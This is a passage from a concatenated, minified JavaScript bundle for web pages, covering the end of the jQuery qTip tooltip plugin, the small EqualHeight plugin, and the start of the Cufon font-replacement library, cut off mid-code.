y=="object"&&y.length>0){s.elements.target.data("qtip").current=y.length-1}else{s.elements.target.removeData("qtip")}s.onDestroy.call(s);f.fn.qtip.log.error.call(s,1,f.fn.qtip.constants.EVENT_DESTROYED,"destroy");return s.elements.target},getPosition:function(){var w,x;if(!s.status.rendered){return f.fn.qtip.log.error.call(s,2,f.fn.qtip.constants.TOOLTIP_NOT_RENDERED,"getPosition")}w=(s.elements.tooltip.css("display")!=="none")?false:true;if(w){s.elements.tooltip.css({visiblity:"hidden"}).show()}x=s.elements.tooltip.offset();if(w){s.elements.tooltip.css({visiblity:"visible"}).hide()}return x},getDimensions:function(){var w,x;if(!s.status.rendered){return f.fn.qtip.log.error.call(s,2,f.fn.qtip.constants.TOOLTIP_NOT_RENDERED,"getDimensions")}w=(!s.elements.tooltip.is(":visible"))?true:false;if(w){s.elements.tooltip.css({visiblity:"hidden"}).show()}x={height:s.elements.tooltip.outerHeight(),width:s.elements.tooltip.outerWidth()};if(w){s.elements.tooltip.css({visiblity:"visible"}).hide()}return x}})}function p(){var s,w,u,t,v,y,x;s=this;s.beforeRender.call(s);s.status.rendered=true;s.elements.tooltip='<div qtip="'+s.id+'" class="qtip '+(s.options.style.classes.tooltip||s.options.style)+'"style="display:none; -moz-border-radius:0; -webkit-border-radius:0; border-radius:0;position:'+s.options.position.type+';">  <div class="qtip-wrapper" style="position:relative; overflow:hidden; text-align:left;">    <div class="qtip-contentWrapper" style="overflow:hidden;">       <div class="qtip-content '+s.options.style.classes.content+'"></div></div></div></div>';s.elements.tooltip=f(s.elements.tooltip);s.elements.tooltip.appendTo(s.options.position.container);s.elements.tooltip.data("qtip",{current:0,interfaces:[s]});s.elements.wrapper=s.elements.tooltip.children("div:first");s.elements.contentWrapper=s.elements.wrapper.children("div:first").css({background:s.options.style.background});s.elements.content=s.elements.contentWrapper.children("div:first").css(q(s.options.style));if(f.browser.msie){s.elements.wrapper.add(s.elements.content).css({zoom:1})}if(s.options.hide.when.event=="unfocus"){s.elements.tooltip.attr("unfocus",true)}if(typeof s.options.style.width.value=="number"){s.updateWidth()}if(f("<canvas>").get(0).getContext||f.browser.msie){if(s.options.style.border.radius>0){m.call(s)}else{s.elements.contentWrapper.css({border:s.options.style.border.width+"px solid "+s.options.style.border.color})}if(s.options.style.tip.corner!==false){e.call(s)}}else{s.elements.contentWrapper.css({border:s.options.style.border.width+"px solid "+s.options.style.border.color});s.options.style.border.radius=0;s.options.style.tip.corner=false;f.fn.qtip.log.error.call(s,2,f.fn.qtip.constants.CANVAS_VML_NOT_SUPPORTED,"render")}if((typeof s.options.content.text=="string"&&s.options.content.text.length>0)||(s.options.content.text.jquery&&s.options.content.text.length>0)){u=s.options.content.text}else{if(typeof s.elements.target.attr("title")=="string"&&s.elements.target.attr("title").length>0){u=s.elements.target.attr("title").replace("\\n","<br />");s.elements.target.attr("title","")}else{if(typeof s.elements.target.attr("alt")=="string"&&s.elements.target.attr("alt").length>0){u=s.elements.target.attr("alt").replace("\\n","<br />");s.elements.target.attr("alt","")}else{u=" ";f.fn.qtip.log.error.call(s,1,f.fn.qtip.constants.NO_VALID_CONTENT,"render")}}}if(s.options.content.title.text!==false){j.call(s)}s.updateContent(u);l.call(s);if(s.options.show.ready===true){s.show()}if(s.options.content.url!==false){t=s.options.content.url;v=s.options.content.data;y=s.options.content.method||"get";s.loadContent(t,v,y)}s.onRender.call(s);f.fn.qtip.log.error.call(s,1,f.fn.qtip.constants.EVENT_RENDERED,"render")}function m(){var F,z,t,B,x,E,u,G,D,y,w,C,A,s,v;F=this;F.elements.wrapper.find(".qtip-borderBottom, .qtip-borderTop").remove();t=F.options.style.border.width;B=F.options.style.border.radius;x=F.options.style.border.color||F.options.style.tip.color;E=g(B);u={};for(z in E){u[z]='<div rel="'+z+'" style="'+((z.search(/Left/)!==-1)?"left":"right")+":0; position:absolute; height:"+B+"px; width:"+B+'px; overflow:hidden; line-height:0.1px; font-size:1px">';if(f("<canvas>").get(0).getContext){u[z]+='<canvas height="'+B+'" width="'+B+'" style="vertical-align: top"></canvas>'}else{if(f.browser.msie){G=B*2+3;u[z]+='<v:arc stroked="false" fillcolor="'+x+'" startangle="'+E[z][0]+'" endangle="'+E[z][1]+'" style="width:'+G+"px; height:"+G+"px; margin-top:"+((z.search(/bottom/)!==-1)?-2:-1)+"px; margin-left:"+((z.search(/Right/)!==-1)?E[z][2]-3.5:-1)+'px; vertical-align:top; display:inline-block; behavior:url(#default#VML)"></v:arc>'}}u[z]+="</div>"}D=F.getDimensions().width-(Math.max(t,B)*2);y='<div class="qtip-betweenCorners" style="height:'+B+"px; width:"+D+"px; overflow:hidden; background-color:"+x+'; line-height:0.1px; font-size:1px;">';w='<div class="qtip-borderTop" dir="ltr" style="height:'+B+"px; margin-left:"+B+'px; line-height:0.1px; font-size:1px; padding:0;">'+u.topLeft+u.topRight+y;F.elements.wrapper.prepend(w);C='<div class="qtip-borderBottom" dir="ltr" style="height:'+B+"px; margin-left:"+B+'px; line-height:0.1px; font-size:1px; padding:0;">'+u.bottomLeft+u.bottomRight+y;F.elements.wrapper.append(C);if(f("<canvas>").get(0).getContext){F.elements.wrapper.find("canvas").each(function(){A=E[f(this).parent("[rel]:first").attr("rel")];r.call(F,f(this),A,B,x)})}else{if(f.browser.msie){F.elements.tooltip.append('<v:image style="behavior:url(#default#VML);"></v:image>')}}s=Math.max(B,(B+(t-B)));v=Math.max(t-B,0);F.elements.contentWrapper.css({border:"0px solid "+x,borderWidth:v+"px "+s+"px"})}function r(u,w,s,t){var v=u.get(0).getContext("2d");v.fillStyle=t;v.beginPath();v.arc(w[0],w[1],s,0,Math.PI*2,false);v.fill()}function e(v){var t,s,x,u,w;t=this;if(t.elements.tip!==null){t.elements.tip.remove()}s=t.options.style.tip.color||t.options.style.border.color;if(t.options.style.tip.corner===false){return}else{if(!v){v=t.options.style.tip.corner}}x=b(v,t.options.style.tip.size.width,t.options.style.tip.size.height);t.elements.tip='<div class="'+t.options.style.classes.tip+'" dir="ltr" rel="'+v+'" style="position:absolute; height:'+t.options.style.tip.size.height+"px; width:"+t.options.style.tip.size.width+'px; margin:0 auto; line-height:0.1px; font-size:1px;">';if(f("<canvas>").get(0).getContext){t.elements.tip+='<canvas height="'+t.options.style.tip.size.height+'" width="'+t.options.style.tip.size.width+'"></canvas>'}else{if(f.browser.msie){u=t.options.style.tip.size.width+","+t.options.style.tip.size.height;w="m"+x[0][0]+","+x[0][1];w+=" l"+x[1][0]+","+x[1][1];w+=" "+x[2][0]+","+x[2][1];w+=" xe";t.elements.tip+='<v:shape fillcolor="'+s+'" stroked="false" filled="true" path="'+w+'" coordsize="'+u+'" style="width:'+t.options.style.tip.size.width+"px; height:"+t.options.style.tip.size.height+"px; line-height:0.1px; display:inline-block; behavior:url(#default#VML); vertical-align:"+((v.search(/top/)!==-1)?"bottom":"top")+'"></v:shape>';t.elements.tip+='<v:image style="behavior:url(#default#VML);"></v:image>';t.elements.contentWrapper.css("position","relative")}}t.elements.tooltip.prepend(t.elements.tip+"</div>");t.elements.tip=t.elements.tooltip.find("."+t.options.style.classes.tip).eq(0);if(f("<canvas>").get(0).getContext){h.call(t,t.elements.tip.find("canvas:first"),x,s)}if(v.search(/top/)!==-1&&f.browser.msie&&parseInt(f.browser.version.charAt(0))===6){t.elements.tip.css({marginTop:-4})}n.call(t,v)}function h(t,v,s){var u=t.get(0).getContext("2d");u.fillStyle=s;u.beginPath();u.moveTo(v[0][0],v[0][1]);u.lineTo(v[1][0],v[1][1]);u.lineTo(v[2][0],v[2][1]);u.fill()}function n(u){var t,w,s,x,v;t=this;if(t.options.style.tip.corner===false||!t.elements.tip){return}if(!u){u=t.elements.tip.attr("rel")}w=positionAdjust=(f.browser.msie)?1:0;t.elements.tip.css(u.match(/left|right|top|bottom/)[0],0);if(u.search(/top|bottom/)!==-1){if(f.browser.msie){if(parseInt(f.browser.version.charAt(0))===6){positionAdjust=(u.search(/top/)!==-1)?-3:1}else{positionAdjust=(u.search(/top/)!==-1)?1:2}}if(u.search(/Middle/)!==-1){t.elements.tip.css({left:"50%",marginLeft:-(t.options.style.tip.size.width/2)})}else{if(u.search(/Left/)!==-1){t.elements.tip.css({left:t.options.style.border.radius-w})}else{if(u.search(/Right/)!==-1){t.elements.tip.css({right:t.options.style.border.radius+w})}}}if(u.search(/top/)!==-1){t.elements.tip.css({top:-positionAdjust})}else{t.elements.tip.css({bottom:positionAdjust})}}else{if(u.search(/left|right/)!==-1){if(f.browser.msie){positionAdjust=(parseInt(f.browser.version.charAt(0))===6)?1:((u.search(/left/)!==-1)?1:2)}if(u.search(/Middle/)!==-1){t.elements.tip.css({top:"50%",marginTop:-(t.options.style.tip.size.height/2)})}else{if(u.search(/Top/)!==-1){t.elements.tip.css({top:t.options.style.border.radius-w})}else{if(u.search(/Bottom/)!==-1){t.elements.tip.css({bottom:t.options.style.border.radius+w})}}}if(u.search(/left/)!==-1){t.elements.tip.css({left:-positionAdjust})}else{t.elements.tip.css({right:positionAdjust})}}}s="padding-"+u.match(/left|right|top|bottom/)[0];x=t.options.style.tip.size[(s.search(/left|right/)!==-1)?"width":"height"];t.elements.tooltip.css("padding",0);t.elements.tooltip.css(s,x);if(f.browser.msie&&parseInt(f.browser.version.charAt(0))==6){v=parseInt(t.elements.tip.css("margin-top"))||0;v+=parseInt(t.elements.content.css("margin-top"))||0;t.elements.tip.css({marginTop:v})}}function j(){var s=this;if(s.elements.title!==null){s.elements.title.remove()}s.elements.title=f('<div class="'+s.options.style.classes.title+'">').css(q(s.options.style.title,true)).css({zoom:(f.browser.msie)?1:0}).prependTo(s.elements.contentWrapper);if(s.options.content.title.text){s.updateTitle.call(s,s.options.content.title.text)}if(s.options.content.title.button!==false&&typeof s.options.content.title.button=="string"){s.elements.button=f('<a class="'+s.options.style.classes.button+'" style="float:right; position: relative"></a>').css(q(s.options.style.button,true)).html(s.options.content.title.button).prependTo(s.elements.title).click(function(t){if(!s.status.disabled){s.hide(t)}})}}function l(){var t,v,u,s;t=this;v=t.options.show.when.target;u=t.options.hide.when.target;if(t.options.hide.fixed){u=u.add(t.elements.tooltip)}if(t.options.hide.when.event=="inactive"){s=["click","dblclick","mousedown","mouseup","mousemove","mouseout","mouseenter","mouseleave","mouseover"];function y(z){if(t.status.disabled===true){return}clearTimeout(t.timers.inactive);t.timers.inactive=setTimeout(function(){f(s).each(function(){u.unbind(this+".qtip-inactive");t.elements.content.unbind(this+".qtip-inactive")});t.hide(z)},t.options.hide.delay)}}else{if(t.options.hide.fixed===true){t.elements.tooltip.bind("mouseover.qtip",function(){if(t.status.disabled===true){return}clearTimeout(t.timers.hide)})}}function x(z){if(t.status.disabled===true){return}if(t.options.hide.when.event=="inactive"){f(s).each(function(){u.bind(this+".qtip-inactive",y);t.elements.content.bind(this+".qtip-inactive",y)});y()}clearTimeout(t.timers.show);clearTimeout(t.timers.hide);t.timers.show=setTimeout(function(){t.show(z)},t.options.show.delay)}function w(z){if(t.status.disabled===true){return}if(t.options.hide.fixed===true&&t.options.hide.when.event.search(/mouse(out|leave)/i)!==-1&&f(z.relatedTarget).parents("div.qtip[qtip]").length>0){z.stopPropagation();z.preventDefault();clearTimeout(t.timers.hide);return false}clearTimeout(t.timers.show);clearTimeout(t.timers.hide);t.elements.tooltip.stop(true,true);t.timers.hide=setTimeout(function(){t.hide(z)},t.options.hide.delay)}if((t.options.show.when.target.add(t.options.hide.when.target).length===1&&t.options.show.when.event==t.options.hide.when.event&&t.options.hide.when.event!=="inactive")||t.options.hide.when.event=="unfocus"){t.cache.toggle=0;v.bind(t.options.show.when.event+".qtip",function(z){if(t.cache.toggle==0){x(z)}else{w(z)}})}else{v.bind(t.options.show.when.event+".qtip",x);if(t.options.hide.when.event!=="inactive"){u.bind(t.options.hide.when.event+".qtip",w)}}if(t.options.position.type.search(/(fixed|absolute)/)!==-1){t.elements.tooltip.bind("mouseover.qtip",t.focus)}if(t.options.position.target==="mouse"&&t.options.position.type!=="static"){v.bind("mousemove.qtip",function(z){t.cache.mouse={x:z.pageX,y:z.pageY};if(t.status.disabled===false&&t.options.position.adjust.mouse===true&&t.options.position.type!=="static"&&t.elements.tooltip.css("display")!=="none"){t.updatePosition(z)}})}}function o(u,v,A){var z,s,x,y,t,w;z=this;if(A.corner=="center"){return v.position}s=f.extend({},u);y={x:false,y:false};t={left:(s.left<f.fn.qtip.cache.screen.scroll.left),right:(s.left+A.dimensions.width+2>=f.fn.qtip.cache.screen.width+f.fn.qtip.cache.screen.scroll.left),top:(s.top<f.fn.qtip.cache.screen.scroll.top),bottom:(s.top+A.dimensions.height+2>=f.fn.qtip.cache.screen.height+f.fn.qtip.cache.screen.scroll.top)};x={left:(t.left&&(A.corner.search(/right/i)!=-1||(A.corner.search(/right/i)==-1&&!t.right))),right:(t.right&&(A.corner.search(/left/i)!=-1||(A.corner.search(/left/i)==-1&&!t.left))),top:(t.top&&A.corner.search(/top/i)==-1),bottom:(t.bottom&&A.corner.search(/bottom/i)==-1)};if(x.left){if(z.options.position.target!=="mouse"){s.left=v.position.left+v.dimensions.width}else{s.left=z.cache.mouse.x}y.x="Left"}else{if(x.right){if(z.options.position.target!=="mouse"){s.left=v.position.left-A.dimensions.width}else{s.left=z.cache.mouse.x-A.dimensions.width}y.x="Right"}}if(x.top){if(z.options.position.target!=="mouse"){s.top=v.position.top+v.dimensions.height}else{s.top=z.cache.mouse.y}y.y="top"}else{if(x.bottom){if(z.options.position.target!=="mouse"){s.top=v.position.top-A.dimensions.height}else{s.top=z.cache.mouse.y-A.dimensions.height}y.y="bottom"}}if(s.left<0){s.left=u.left;y.x=false}if(s.top<0){s.top=u.top;y.y=false}if(z.options.style.tip.corner!==false){s.corner=new String(A.corner);if(y.x!==false){s.corner=s.corner.replace(/Left|Right|Middle/,y.x)}if(y.y!==false){s.corner=s.corner.replace(/top|bottom/,y.y)}if(s.corner!==z.elements.tip.attr("rel")){e.call(z,s.corner)}}return s}function q(u,t){var v,s;v=f.extend(true,{},u);for(s in v){if(t===true&&s.search(/(tip|classes)/i)!==-1){delete v[s]}else{if(!t&&s.search(/(width|border|tip|title|classes|user)/i)!==-1){delete v[s]}}}return v}function c(s){if(typeof s.tip!=="object"){s.tip={corner:s.tip}}if(typeof s.tip.size!=="object"){s.tip.size={width:s.tip.size,height:s.tip.size}}if(typeof s.border!=="object"){s.border={width:s.border}}if(typeof s.width!=="object"){s.width={value:s.width}}if(typeof s.width.max=="string"){s.width.max=parseInt(s.width.max.replace(/([0-9]+)/i,"$1"))}if(typeof s.width.min=="string"){s.width.min=parseInt(s.width.min.replace(/([0-9]+)/i,"$1"))}if(typeof s.tip.size.x=="number"){s.tip.size.width=s.tip.size.x;delete s.tip.size.x}if(typeof s.tip.size.y=="number"){s.tip.size.height=s.tip.size.y;delete s.tip.size.y}return s}function a(){var s,t,u,x,v,w;s=this;u=[true,{}];for(t=0;t<arguments.length;t++){u.push(arguments[t])}x=[f.extend.apply(f,u)];while(typeof x[0].name=="string"){x.unshift(c(f.fn.qtip.styles[x[0].name]))}x.unshift(true,{classes:{tooltip:"qtip-"+(arguments[0].name||"defaults")}},f.fn.qtip.styles.defaults);v=f.extend.apply(f,x);w=(f.browser.msie)?1:0;v.tip.size.width+=w;v.tip.size.height+=w;if(v.tip.size.width%2>0){v.tip.size.width+=1}if(v.tip.size.height%2>0){v.tip.size.height+=1}if(v.tip.corner===true){v.tip.corner=(s.options.position.corner.tooltip==="center")?false:s.options.position.corner.tooltip}return v}function b(v,u,t){var s={bottomRight:[[0,0],[u,t],[u,0]],bottomLeft:[[0,0],[u,0],[0,t]],topRight:[[0,t],[u,0],[u,t]],topLeft:[[0,0],[0,t],[u,t]],topMiddle:[[0,t],[u/2,0],[u,t]],bottomMiddle:[[0,0],[u,0],[u/2,t]],rightMiddle:[[0,0],[u,t/2],[0,t]],leftMiddle:[[u,0],[u,t],[0,t/2]]};s.leftTop=s.bottomRight;s.rightTop=s.bottomLeft;s.leftBottom=s.topRight;s.rightBottom=s.topLeft;return s[v]}function g(s){var t;if(f("<canvas>").get(0).getContext){t={topLeft:[s,s],topRight:[0,s],bottomLeft:[s,0],bottomRight:[0,0]}}else{if(f.browser.msie){t={topLeft:[-90,90,0],topRight:[-90,90,-s],bottomLeft:[90,270,0],bottomRight:[90,270,-s]}}}return t}function k(){var s,t,u;s=this;u=s.getDimensions();t='<iframe class="qtip-bgiframe" frameborder="0" tabindex="-1" src="javascript:false" style="display:block; position:absolute; z-index:-1; filter:alpha(opacity=\'0\'); border: 1px solid red; height:'+u.height+"px; width:"+u.width+'px" />';s.elements.bgiframe=s.elements.wrapper.prepend(t).children(".qtip-bgiframe:first")}f(document).ready(function(){f.fn.qtip.cache={screen:{scroll:{left:f(window).scrollLeft(),top:f(window).scrollTop()},width:f(window).width(),height:f(window).height()}};var s;f(window).bind("resize scroll",function(t){clearTimeout(s);s=setTimeout(function(){if(t.type==="scroll"){f.fn.qtip.cache.screen.scroll={left:f(window).scrollLeft(),top:f(window).scrollTop()}}else{f.fn.qtip.cache.screen.width=f(window).width();f.fn.qtip.cache.screen.height=f(window).height()}for(i=0;i<f.fn.qtip.interfaces.length;i++){var u=f.fn.qtip.interfaces[i];if(u.status.rendered===true&&(u.options.position.type!=="static"||u.options.position.adjust.scroll&&t.type==="scroll"||u.options.position.adjust.resize&&t.type==="resize")){u.updatePosition(t,true)}}},100)});f(document).bind("mousedown.qtip",function(t){if(f(t.target).parents("div.qtip").length===0){f(".qtip[unfocus]").each(function(){var u=f(this).qtip("api");if(f(this).is(":visible")&&!u.status.disabled&&f(t.target).add(u.elements.target).length>1){u.hide(t)}})}})});f.fn.qtip.interfaces=[];f.fn.qtip.log={error:function(){return this}};f.fn.qtip.constants={};f.fn.qtip.defaults={content:{prerender:false,text:false,url:false,data:null,title:{text:false,button:false}},position:{target:false,corner:{target:"bottomRight",tooltip:"topLeft"},adjust:{x:0,y:0,mouse:true,screen:false,scroll:true,resize:true},type:"absolute",container:false},show:{when:{target:false,event:"mouseover"},effect:{type:"fade",length:100},delay:140,solo:false,ready:false},hide:{when:{target:false,event:"mouseout"},effect:{type:"fade",length:100},delay:0,fixed:false},api:{beforeRender:function(){},onRender:function(){},beforePositionUpdate:function(){},onPositionUpdate:function(){},beforeShow:function(){},onShow:function(){},beforeHide:function(){},onHide:function(){},beforeContentUpdate:function(){},onContentUpdate:function(){},beforeContentLoad:function(){},onContentLoad:function(){},beforeTitleUpdate:function(){},onTitleUpdate:function(){},beforeDestroy:function(){},onDestroy:function(){},beforeFocus:function(){},onFocus:function(){}}};f.fn.qtip.styles={defaults:{background:"white",color:"#111",overflow:"hidden",textAlign:"left",width:{min:0,max:250},padding:"5px 9px",border:{width:1,radius:0,color:"#d3d3d3"},tip:{corner:false,color:false,size:{width:13,height:13},opacity:1},title:{background:"#e1e1e1",fontWeight:"bold",padding:"7px 12px"},button:{cursor:"pointer"},classes:{target:"",tip:"qtip-tip",title:"qtip-title",button:"qtip-button",content:"qtip-content",active:"qtip-active"}},cream:{border:{width:3,radius:0,color:"#F9E98E"},title:{background:"#F0DE7D",color:"#A27D35"},background:"#FBF7AA",color:"#A27D35",classes:{tooltip:"qtip-cream"}},light:{border:{width:3,radius:0,color:"#E2E2E2"},title:{background:"#f1f1f1",color:"#454545"},background:"white",color:"#454545",classes:{tooltip:"qtip-light"}},dark:{border:{width:3,radius:0,color:"#303030"},title:{background:"#404040",color:"#f3f3f3"},background:"#505050",color:"#f3f3f3",classes:{tooltip:"qtip-dark"}},red:{border:{width:3,radius:0,color:"#CE6F6F"},title:{background:"#f28279",color:"#9C2F2F"},background:"#F79992",color:"#9C2F2F",classes:{tooltip:"qtip-red"}},green:{border:{width:3,radius:0,color:"#A9DB66"},title:{background:"#b9db8c",color:"#58792E"},background:"#CDE6AC",color:"#58792E",classes:{tooltip:"qtip-green"}},blue:{border:{width:3,radius:0,color:"#ADD9ED"},title:{background:"#D0E9F5",color:"#5E99BD"},background:"#E5F6FE",color:"#4D9FBF",classes:{tooltip:"qtip-blue"}}}})(jQuery);


/**
 * EqualHeight 1.0
 *
 * Makes all matched elements equal height. Does not work in
 * browsers that do not support min-height (no IE.. who cares)
 *
 * Usage: jQuery('#content, #sub-content').equoalHeight();
 *
 * @class equalHeight
 *
 * Copyright (c) 2008 Andreas Lagerkvist (andreaslagerkvist.com)
 * Released under a GNU General Public License v3 (http://creativecommons.org/licenses/by/3.0/)
 */
jQuery.fn.equalHeight = function() {
        var height = 0, 
                maxHeight = 0;


        // Store the tallest element's height
        this.each(function() {
                var t = jQuery(this);
                height = t.height() + parseInt(t.css('paddingTop'), 10) + parseInt(t.css('paddingBottom'), 10) + parseInt(t.css('borderTopWidth'), 10) + parseInt(t.css('borderBottomWidth'), 10);
                maxHeight = (height > maxHeight) ? height : maxHeight;
        });


        // Set element's min-height to tallest element's height
        return this.each(function() {
                var t = jQuery(this);
                        mh = maxHeight - (parseInt(t.css('paddingTop'), 10) + parseInt(t.css('paddingBottom'), 10) + parseInt(t.css('borderTopWidth'), 10) + parseInt(t.css('borderBottomWidth'), 10));
                t.css({minHeight: mh +'px'});
        });
};



/*
 * Copyright (c) 2009 Simo Kinnunen.
 * Licensed under the MIT license.
 *
 * @version 1.09
 */
var Cufon=(function(){var m=function(){return m.replace.apply(null,arguments)};var x=m.DOM={ready:(function(){var C=false,E={loaded:1,complete:1};var B=[],D=function(){if(C){return}C=true;for(var F;F=B.shift();F()){}};if(document.addEventListener){document.addEventListener("DOMContentLoaded",D,false);window.addEventListener("pageshow",D,false)}if(!window.opera&&document.readyState){(function(){E[document.readyState]?D():setTimeout(arguments.callee,10)})()}if(document.readyState&&document.createStyleSheet){(function(){try{document.body.doScroll("left");D()}catch(F){setTimeout(arguments.callee,1)}})()}q(window,"load",D);return function(F){if(!arguments.length){D()}else{C?F():B.push(F)}}})(),root:function(){return document.documentElement||document.body}};var n=m.CSS={Size:function(C,B){this.value=parseFloat(C);this.unit=String(C).match(/[a-z%]*$/)[0]||"px";this.convert=function(D){return D/B*this.value};this.convertFrom=function(D){return D/this.value*B};this.toString=function(){return this.value+this.unit}},addClass:function(C,B){var D=C.className;C.className=D+(D&&" ")+B;return C},color:j(function(C){var B={};B.color=C.replace(/^rgba\((.*?),\s*([\d.]+)\)/,function(E,D,F){B.opacity=parseFloat(F);return"rgb("+D+")"});return B}),fontStretch:j(function(B){if(typeof B=="number"){return B}if(/%$/.test(B)){return parseFloat(B)/100}return{"ultra-condensed":0.5,"extra-condensed":0.625,condensed:0.75,"semi-condensed":0.875,"semi-expanded":1.125,expanded:1.25,"extra-expanded":1.5,"ultra-expanded":2}[B]||1}),getStyle:function(C){var B=document.defaultView;if(B&&B.getComputedStyle){return new a(B.getComputedStyle(C,null))}if(C.currentStyle){return new a(C.currentStyle)}return new a(C.style)},gradient:j(function(F){var G={id:F,type:F.match(/^-([a-z]+)-gradient\(/)[1],stops:[]},C=F.substr(F.indexOf("(")).match(/([\d.]+=)?(#[a-f0-9]+|[a-z]+\(.*?\)|[a-z]+)/ig);for(var E=0,B=C.length,D;E<B;++E){D=C[E].split("=",2).reverse();G.stops.push([D[1]||E/(B-1),D[0]])}return G}),quotedList:j(function(E){var D=[],C=/\s*((["'])([\s\S]*?[^\\])\2|[^,]+)\s*/g,B;while(B=C.exec(E)){D.push(B[3]||B[1])}return D}),recognizesMedia:j(function(G){var E=document.createElement("style"),D,C,B;E.type="text/css";E.media=G;try{E.appendChild(document.createTextNode("/**/"))}catch(F){}C=g("head")[0];C.insertBefore(E,C.firstChild);D=(E.sheet||E.styleSheet);B=D&&!D.disabled;C.removeChild(E);return B}),removeClass:function(D,C){var B=RegExp("(?:^|\\s+)"+C+"(?=\\s|$)","g");D.className=D.className.replace(B,"");return D},supports:function(D,C){var B=document.createElement("span").style;if(B[D]===undefined){return false}B[D]=C;return B[D]===C},textAlign:function(E,D,B,C){if(D.get("textAlign")=="right"){if(B>0){E=" "+E}}else{if(B<C-1){E+=" "}}return E},textShadow:j(function(F){if(F=="none"){return null}var E=[],G={},B,C=0;var D=/(#[a-f0-9]+|[a-z]+\(.*?\)|[a-z]+)|(-?[\d.]+[a-z%]*)|,/ig;while(B=D.exec(F)){if(B[0]==","){E.push(G);G={};C=0}else{if(B[1]){G.color=B[1]}else{G[["offX","offY","blur"][C++]]=B[2]}}}E.push(G);return E}),textTransform:(function(){var B={uppercase:function(C){return C.toUpperCase()},lowercase:function(C){return C.toLowerCase()},capitalize:function(C){return C.replace(/\b./g,function(D){return D.toUpperCase()})}};return function(E,D){var C=B[D.get("textTransform")];return C?C(E):E}})(),whiteSpace:(function(){var D={inline:1,"inline-block":1,"run-in":1};var C=/^\s+/,B=/\s+$/;return function(H,F,G,E){if(E){if(E.nodeName.toLowerCase()=="br"){H=H.replace(C,"")}}if(D[F.get("display")]){return H}if(!G.previousSibling){H=H.replace(C,"")}if(!G.nextSibling){H=H.replace(B,"")}return H}})()};n.ready=(function(){var B=!n.recognizesMedia("all"),E=false;var D=[],H=function(){B=true;for(var K;K=D.shift();K()){}};var I=g("link"),J=g("style");function C(K){return K.disabled||G(K.sheet,K.media||"screen")}function G(M,P){if(!n.recognizesMedia(P||"all")){return true}if(!M||M.disabled){return false}try{var Q=M.cssRules,O;if(Q){search:for(var L=0,K=Q.length;O=Q[L],L<K;++L){switch(O.type){case 2:break;case 3:if(!G(O.styleSheet,O.media.mediaText)){return false}break;default:break search}}}}catch(N){}return true}function F(){if(document.createStyleSheet){return true}var L,K;for(K=0;L=I[K];++K){if(L.rel.toLowerCase()=="stylesheet"&&!C(L)){return false}}for(K=0;L=J[K];++K){if(!C(L)){return false}}return true}x.ready(function(){if(!E){E=n.getStyle(document.body).isUsable()}if(B||(E&&F())){H()}else{setTimeout(arguments.callee,10)}});return function(K){if(B){K()}else{D.push(K)}}})();function s(D){var C=this.face=D.face,B={"\u0020":1,"\u00a0":1,"\u3000":1};this.glyphs=D.glyphs;this.w=D.w;this.baseSize=parseInt(C["units-per-em"],10);this.family=C["font-family"].toLowerCase();this.weight=C["font-weight"];this.style=C["font-style"]||"normal";this.viewBox=(function(){var F=C.bbox.split(/\s+/);var E={minX:parseInt(F[0],10),minY:parseInt(F[1],10),maxX:parseInt(F[2],10),maxY:parseInt(F[3],10)};E.width=E.maxX-E.minX;E.height=E.maxY-E.minY;E.toString=function(){return[this.minX,this.minY,this.width,this.height].join(" ")};return E})();this.ascent=-parseInt(C.ascent,10);this.descent=-parseInt(C.descent,10);this.height=-this.ascent+this.descent;this.spacing=function(L,N,E){var O=this.glyphs,M,K,G,P=[],F=0,J=-1,I=-1,H;while(H=L[++J]){M=O[H]||this.missingGlyph;if(!M){continue}if(K){F-=G=K[H]||0;P[I]-=G}F+=P[++I]=~~(M.w||this.w)+N+(B[H]?E:0);K=M.k}P.total=F;return P}}function f(){var C={},B={oblique:"italic",italic:"oblique"};this.add=function(D){(C[D.style]||(C[D.style]={}))[D.weight]=D};this.get=function(H,I){var G=C[H]||C[B[H]]||C.normal||C.italic||C.oblique;if(!G){return null}I={normal:400,bold:700}[I]||parseInt(I,10);if(G[I]){return G[I]}var E={1:1,99:0}[I%100],K=[],F,D;if(E===undefined){E=I>400}if(I==500){I=400}for(var J in G){if(!k(G,J)){continue}J=parseInt(J,10);if(!F||J<F){F=J}if(!D||J>D){D=J}K.push(J)}if(I<F){I=F}if(I>D){I=D}K.sort(function(M,L){return(E?(M>=I&&L>=I)?M<L:M>L:(M<=I&&L<=I)?M>L:M<L)?-1:1});return G[K[0]]}}function r(){function D(F,G){if(F.contains){return F.contains(G)}return F.compareDocumentPosition(G)&16}function B(G){var F=G.relatedTarget;if(!F||D(this,F)){return}C(this,G.type=="mouseover")}function E(F){C(this,F.type=="mouseenter")}function C(F,G){setTimeout(function(){var H=d.get(F).options;m.replace(F,G?h(H,H.hover):H,true)},10)}this.attach=function(F){if(F.onmouseenter===undefined){q(F,"mouseover",B);q(F,"mouseout",B)}else{q(F,"mouseenter",E);q(F,"mouseleave",E)}}}function u(){var C=[],D={};function B(H){var E=[],G;for(var F=0;G=H[F];++F){E[F]=C[D[G]]}return E}this.add=function(F,E){D[F]=C.push(E)-1};this.repeat=function(){var E=arguments.length?B(arguments):C,F;for(var G=0;F=E[G++];){m.replace(F[0],F[1],true)}}}function A(){var D={},B=0;function C(E){return E.cufid||(E.cufid=++B)}this.get=function(E){var F=C(E);return D[F]||(D[F]={})}}function a(B){var D={},C={};this.extend=function(E){for(var F in E){if(k(E,F)){D[F]=E[F]}}return this};this.get=function(E){return D[E]!=undefined?D[E]:B[E]};this.getSize=function(F,E){return C[F]||(C[F]=new n.Size(this.get(F),E))};this.isUsable=function(){return !!B}}function q(C,B,D){if(C.addEventListener){C.addEventListener(B,D,false)}else{if(C.attachEvent){C.attachEvent("on"+B,function(){return D.call(C,window.event)})}}}function v(C,B){var D=d.get(C);if(D.options){return C}if(B.hover&&B.hoverables[C.nodeName.toLowerCase()]){b.attach(C)}D.options=B;return C}function j(B){var C={};return function(D){if(!k(C,D)){C[D]=B.apply(null,arguments)}return C[D]}}function c(F,E){var B=n.quotedList(E.get("fontFamily").toLowerCase()),D;for(var C=0;D=B[C];++C){if(i[D]){return i[D].get(E.get("fontStyle"),E.get("fontWeight"))}}return null}function g(B){return document.getElementsByTagName(B)}function k(C,B){return C.hasOwnProperty(B)}function h(){var C={},B,F;for(var E=0,D=arguments.length;B=arguments[E],E<D;++E){for(F in B){if(k(B,F)){C[F]=B[F]}}}return C}function o(E,M,C,N,F,D){var K=document.createDocumentFragment(),H;if(M===""){return K}var L=N.separate;var 